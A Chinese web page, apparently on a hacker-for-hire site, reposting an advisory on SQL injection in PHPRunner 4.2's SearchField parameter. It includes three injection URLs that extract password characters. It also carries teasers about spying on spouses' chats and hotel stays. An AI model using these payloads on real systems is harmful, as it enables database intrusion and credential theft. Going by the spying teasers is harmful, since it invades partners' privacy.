PHPRunner SearchField参数SQL注入漏洞

访客4年前关于黑客接单1128

影响版本:
XLineSoft PHPRunner 4.2
漏洞描述:
BUGTRAQ  ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964

PHPRunner是一款PHP网页 *** 工具,可以生成读写MySql数据库的PHP网页。

PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。 <*参考 
http://secuni *** /advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2.
*>
SEBUG安全建议:
厂商补丁:

XLineSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xlinesoft.com/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like   \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--


标签: 好话题

相关文章

f4当年为什么解散 原来很火的F4为什么解散了

事实上,它们不是一个组合。流星花园的版权是日文的。当时,日本收回了F4的名字,所以他们不能再叫它了。单独飞行更有利于发展!然后他们就分道扬镳了!...

怎么样删除微信好友对方不知道(2019微信批量删除好友的方法)

微信已经成为我们日常生活中不可或缺的社交工具,微信好友越来越多,人也越来越杂。对于哪些长时间不联系的好友,我们如何判断自己是否被TA删除了呢? 之前很多人都是用群发消息的方法...

怎么找黑客的联系方式 我想知道如何寻找网络黑客联系方式_新浪旅游_新浪网

1 怎么找黑客的联系方式 多亏了媒体,“黑客”这个词已经被狼借用了。这个词让人联想到恶意计算机用户想要寻找新的方法来骚扰人们,欺骗公司,窃取信息,甚至通过渗透军事计算机系统来破坏经济或发动战争。虽然不...

用自己的手机查老婆和别人聊天(查看老婆已删除聊天记录)?

微信删除的聊天纪录是怎样恢复的,咱们可以选择根据每天都应用微信和种种百般的人举行交换,临时不删除微信的缓存,会影响咱们手机的速率。这些缓存中也有紧张的聊天纪录,若咱们在整顿手机体系的时分,毛病地删除了...

查老公住宾馆派出所给查吗_查老公住在哪家酒店

查老公住宾馆派出所给查吗_查老公住在哪家酒店 LivePerson创建了一个平台,用于监控人类和机器人在Chatfuel和IBM Watson等平台上进行的客户对话。LivePerson推出了结合机...

酒店入住记录保存多久

很多人去旅游以及出轨的时候都会去酒店进行开房,而这种行为会在网上留下一些个人的记录,所以很多人在改邪归正以后或者不想自己的隐私泄露,就非常关注自己的酒店入住记录会保存多久。其实这个是相对来说比较长的,...